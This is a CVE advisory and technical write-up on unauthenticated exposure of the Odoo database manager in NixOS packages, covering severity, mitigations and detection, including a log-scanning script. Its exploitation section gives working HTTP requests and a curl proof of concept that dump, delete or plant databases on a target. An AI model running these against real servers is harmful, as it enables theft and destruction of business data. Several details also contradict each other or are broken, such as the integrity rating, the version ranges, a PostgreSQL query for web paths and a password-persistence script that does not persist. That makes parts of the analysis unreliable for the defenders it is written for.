CVE-2026-25137
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: None
- Availability: High
Description
The NixOS Odoo package is an open-source ERP and CRM system. From 21.11 to before 25.11 and 26.05, every NixOS-based Odoo setup publicly exposes the database manager without any authentication. This allows unauthorized actors to delete and download the entire database, including Odoo's file store. Unauthorized access is evident from HTTP requests: if access logs and/or Odoo's log have been kept, searching them for requests to /web/database can give indicators of whether this has been actively exploited. The database manager is a feature intended for development and not meant to be publicly reachable. On other setups, a master password acts as a second line of defence. However, due to the nature of NixOS, Odoo is not able to modify its own configuration file and thus unable to persist the auto-generated password. This also applies when a master password is set manually in the web UI: the password is lost when Odoo is restarted. When no password is set, the user is prompted to set one directly via the database manager. This requires no authentication or action by any authorized user or the system administrator. Thus, the database is effectively world-readable by anyone able to reach Odoo. This vulnerability is fixed in 25.11 and 26.05.
Comprehensive Technical Analysis of CVE-2026-25137
NixOS Odoo Database Manager Unauthenticated Exposure Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Overview
CVE-2026-25137 is a critical authentication bypass vulnerability in the NixOS Odoo package, an open-source ERP/CRM system. The flaw arises from the unintended public exposure of Odoo’s database manager interface (/web/database) without any authentication, allowing unauthenticated attackers to delete, download, or manipulate the entire database, including the file store.
Severity Justification (CVSS 9.1 - Critical)
The CVSS v3.1 score of 9.1 (Critical) is justified by the following metrics:
- Attack Vector (AV:N) – Exploitable remotely over the network.
- Attack Complexity (AC:L) – No special conditions required; trivial exploitation.
- Privileges Required (PR:N) – No authentication needed.
- User Interaction (UI:N) – No user interaction required.
- Scope (S:U) – Impact is confined to the vulnerable component (Odoo).
- Confidentiality (C:H) – Full database exposure (sensitive business data, PII, financial records).
- Integrity (I:H) – Complete database deletion or modification possible.
- Availability (A:H) – Database destruction leads to total system unavailability.
Risk Classification
- Exploitability: High (No authentication, no special tools required, publicly accessible endpoint).
- Impact: Critical (Full database compromise, including file storage, leading to data breaches, financial loss, and operational disruption).
- Likelihood of Exploitation: High (Automated scanners can detect and exploit this flaw rapidly).
2. Potential Attack Vectors and Exploitation Methods
Exploitation Pathways
- Unauthenticated Database Access
  - Attackers can directly access /web/database via HTTP/HTTPS.
  - No credentials or prior authentication required.
  - Example Exploit:
    ```http
    GET /web/database HTTP/1.1
    Host: <target-odoo-instance>
    ```
  - Result: Full database management interface is exposed.
- Database Download (Backup Extraction)
  - Attackers can dump the entire database (including sensitive data) via:
    ```http
    POST /web/database/backup HTTP/1.1
    Host: <target-odoo-instance>
    Content-Type: application/x-www-form-urlencoded

    master_pwd=&name=<db_name>&backup_format=zip
    ```
  - Result: A .zip file containing the full database (SQL dump + file store) is downloaded.
- Database Deletion
  - Attackers can permanently delete databases via:
    ```http
    POST /web/database/drop HTTP/1.1
    Host: <target-odoo-instance>
    Content-Type: application/x-www-form-urlencoded

    master_pwd=&name=<db_name>
    ```
  - Result: Immediate and irreversible data loss.
- Database Creation (Malicious DB Injection)
  - Attackers can create new databases with arbitrary configurations:
    ```http
    POST /web/database/create HTTP/1.1
    Host: <target-odoo-instance>
    Content-Type: application/x-www-form-urlencoded

    master_pwd=&name=<malicious_db>&login=<admin_user>&password=<admin_pass>&lang=en_US&country_code=US
    ```
  - Result: Persistent backdoor access via a new admin account.
- File Store Exfiltration
  - Odoo’s file store (attachments, documents, binary data) is included in database backups.
  - Attackers can extract confidential documents, invoices, contracts, and PII.
Post-Exploitation Impact
- Data Breach: Full exfiltration of customer data, financial records, and intellectual property.
- Ransomware: Database deletion followed by ransom demands.
- Supply Chain Attacks: If Odoo integrates with other systems (e.g., payment gateways, HR systems), attackers may pivot into connected infrastructure.
- Reputation Damage: Loss of customer trust, regulatory fines (GDPR, CCPA), and legal liabilities.
3. Affected Systems and Software Versions
Vulnerable Versions
- NixOS Odoo Package:
  - 21.11 to 25.11 (exclusive)
  - 26.0 to 26.05 (exclusive)
Root Cause
- NixOS Configuration Limitation:
  - Odoo’s master password (a secondary authentication layer) is not persisted in NixOS due to immutable configuration files.
  - When Odoo restarts, the master password is lost, reverting the database manager to an unauthenticated state.
  - Unlike traditional Odoo deployments (where the master password is stored in odoo.conf), NixOS prevents runtime configuration changes, leading to this security gap.
Non-Affected Systems
- Standard Odoo Deployments (non-NixOS) where the master password is properly configured.
- NixOS Odoo versions:
  - 25.11 and later
  - 26.05 and later
4. Recommended Mitigation Strategies
Immediate Actions (For Affected Deployments)
- Upgrade Odoo Immediately
  - Apply patches to 25.11 or 26.05 (or later) to resolve the issue.
  - NixOS Users: Update via:
    ```shell
    nix-channel --update
    nixos-rebuild switch --upgrade
    ```
- Network-Level Restrictions
  - Firewall Rules: Block external access to /web/database (allow only from trusted IPs).
  - Reverse Proxy (Nginx/Apache) Rules:
    ```nginx
    location /web/database {
        deny all;
        return 403;
    }
    ```
  - Cloudflare/WAF Rules: Block requests to /web/database* at the edge.
- Temporary Workarounds (If Upgrade Not Possible)
  - Manual Master Password Enforcement:
    - Set a strong master password via the Odoo UI (Settings → Database Manager).
    - Note: This is not persistent in NixOS and must be reapplied after restarts.
  - Automated Script for Password Reapplication:
    ```shell
    # Example script to reapply the master password on restart
    odoo --db_master_password="StrongPassword123!" --stop-after-init
    ```
- Monitoring and Detection
  - Log Analysis: Search for /web/database in:
    - Odoo logs (/var/log/odoo/odoo-server.log)
    - Web server logs (Nginx/Apache)
    - SIEM Alerts (e.g., Splunk, ELK, Wazuh)
  - Indicators of Compromise (IoCs):
    - Unusual POST requests to /web/database/backup, /web/database/drop, or /web/database/create.
    - Multiple failed login attempts followed by successful database access.
    - Unexpected database deletions or new database creations.
Long-Term Mitigations
- Segmentation & Zero Trust
  - Isolate Odoo instances in a dedicated VLAN with strict access controls.
  - Implement mutual TLS (mTLS) for internal communications.
- Database Hardening
  - Encrypt sensitive data at rest (PostgreSQL TDE, filesystem encryption).
  - Enable PostgreSQL logging to detect unauthorized queries.
- Automated Patch Management
  - Use NixOS auto-updates or Ansible/Puppet for consistent patching.
  - Monitor GitHub advisories for Odoo/NixOS security updates.
- Incident Response Planning
  - Backup Strategy: Ensure offline, immutable backups of Odoo databases.
  - Forensic Readiness: Maintain logs for at least 90 days for post-breach analysis.
5. Impact on the Cybersecurity Landscape
Broader Implications
- Supply Chain Risks
  - NixOS is increasingly used in DevOps and cloud-native environments.
  - Misconfigurations in immutable infrastructure (like NixOS) can lead to widespread exposure if not properly secured.
- ERP/CRM Security Challenges
  - Odoo is widely adopted by SMEs, startups, and enterprises for business operations.
  - This vulnerability highlights the criticality of securing ERP/CRM systems, which often contain high-value data.
- Shift in Attacker Focus
  - Ransomware groups may target Odoo instances for data exfiltration + extortion.
  - APT groups could exploit this for espionage (e.g., stealing financial records, customer data).
- Regulatory & Compliance Risks
  - GDPR (EU), CCPA (US), LGPD (Brazil): Unauthorized database access constitutes a reportable breach.
  - PCI DSS: If Odoo processes payments, this could lead to non-compliance.
- Open-Source Security Awareness
  - Demonstrates the need for better security practices in open-source package management (e.g., NixOS, Docker, Helm).
  - Dependency scanning (e.g., trivy, grype) should be mandatory in CI/CD pipelines.
6. Technical Details for Security Professionals
Vulnerability Mechanics
- Odoo Database Manager (/web/database)
  - Intended for development use only (not production).
  - Provides full CRUD operations (Create, Read, Update, Delete) on databases.
  - Master Password Protection:
    - Normally, Odoo enforces a master password (stored in odoo.conf).
    - NixOS Limitation: Odoo cannot modify its own config file (/etc/odoo/odoo.conf), so the password is not persisted across restarts.
- NixOS-Specific Issue
  - NixOS uses immutable configurations, meaning:
    - Odoo’s runtime changes (e.g., master password) are not saved.
    - On restart, the system reverts to the original configuration, removing authentication.
Exploitation Proof of Concept (PoC)
```shell
# Step 1: Check if /web/database is exposed
curl -I http://<target-ip>/web/database
# Step 2: List databases (no auth required)
curl -X POST http://<target-ip>/web/database/list -d "master_pwd="
# Step 3: Download a database backup
curl -X POST http://<target-ip>/web/database/backup \
  -d "master_pwd=&name=odoo_db&backup_format=zip" \
  --output odoo_backup.zip
# Step 4: Delete a database (DESTRUCTIVE)
curl -X POST http://<target-ip>/web/database/drop \
  -d "master_pwd=&name=odoo_db"
```
Detection & Forensics
- Log Analysis Queries:
  ```sql
  -- PostgreSQL logs (if enabled)
  SELECT * FROM pg_stat_activity WHERE query LIKE '%web/database%';
  ```
  ```shell
  # Odoo logs
  grep -i "web/database" /var/log/odoo/odoo-server.log
  # Nginx/Apache logs
  grep -i "/web/database" /var/log/nginx/access.log
  ```
- SIEM Rules (Splunk Example):
  ```
  index=web_logs uri_path="/web/database*" | stats count by src_ip, uri_path, http_method | where count > 5
  ```
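As an added detection example (not part of the original advisory), the following Python script implements the log-analysis idea from the Monitoring and Detection and Detection & Forensics sections over constructed nginx access-log lines: it flags every request to /web/database, rates successful POSTs to the backup, drop and create endpoints as high severity, and separates a blocked (403) attempt, such as one stopped by the reverse-proxy deny rule, from a successful dump. The log format, sample addresses and severity labels are assumptions.

```python
import re
from collections import Counter
# Constructed sample lines in nginx "combined" log format (not from a real incident).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2026:09:14:01 +0000] "GET /web/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2026:09:14:05 +0000] "GET /web/database/manager HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Feb/2026:09:15:10 +0000] "POST /web/database/list HTTP/1.1" 200 312 "-" "curl/8.5.0"
198.51.100.23 - - [10/Feb/2026:09:15:12 +0000] "POST /web/database/backup HTTP/1.1" 200 48372119 "-" "curl/8.5.0"
198.51.100.23 - - [10/Feb/2026:09:15:40 +0000] "POST /web/database/drop HTTP/1.1" 200 88 "-" "curl/8.5.0"
192.0.2.9 - - [10/Feb/2026:09:16:00 +0000] "POST /web/database/backup HTTP/1.1" 403 153 "-" "python-requests/2.31"
192.0.2.9 - - [10/Feb/2026:09:16:30 +0000] "GET /web/image/1234 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints named in the advisory: a successful POST to one of these with an empty
# master password means data was dumped, destroyed or planted.
DESTRUCTIVE = {
    "/web/database/backup": "backup download (exfiltration)",
    "/web/database/drop": "database deletion",
    "/web/database/create": "database creation (possible backdoor account)",
}

def scan_access_log(text):
    """Return one finding per request that touched /web/database, with a severity."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith("/web/database"):
            continue
        path = m["path"].split("?", 1)[0]          # ignore any query string
        status = int(m["status"])
        ok = 200 <= status < 300
        if ok and m["method"] == "POST" and path in DESTRUCTIVE:
            severity, note = "high", DESTRUCTIVE[path]
        elif ok:
            severity, note = "medium", "database manager reached"
        else:
            severity, note = "low", "blocked or failed attempt (deny rule working)"
        findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "path": path, "status": status, "severity": severity, "note": note})
    return findings

def count_by_ip(findings, min_severity="medium"):
    """Count findings per source IP at or above min_severity, for triage ordering."""
    rank = {"low": 0, "medium": 1, "high": 2}
    return Counter(f["ip"] for f in findings if rank[f["severity"]] >= rank[min_severity])
```

Run it against real access logs by replacing SAMPLE_LOG with the file contents; a high-severity backup or drop hit from an untrusted source should be treated as confirmed exposure, not just a scan.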
Patch Analysis
- Fix in 25.11 & 26.05:
- NixOS now enforces a default master password at installation.
- Odoo’s database manager is disabled by default in production mode.
- Manual intervention is required to enable it (with proper authentication).
Conclusion & Recommendations
CVE-2026-25137 is a critical vulnerability with severe real-world impact, enabling unauthenticated database compromise in NixOS Odoo deployments. Organizations must:
- Patch immediately to 25.11 or 26.05.
- Restrict network access to /web/database.
- Monitor logs for exploitation attempts.
- Implement long-term hardening (segmentation, encryption, automated patching).
Failure to mitigate this vulnerability could result in catastrophic data breaches, financial loss, and regulatory penalties. Security teams should treat this as a top-priority incident and conduct a full audit of Odoo deployments.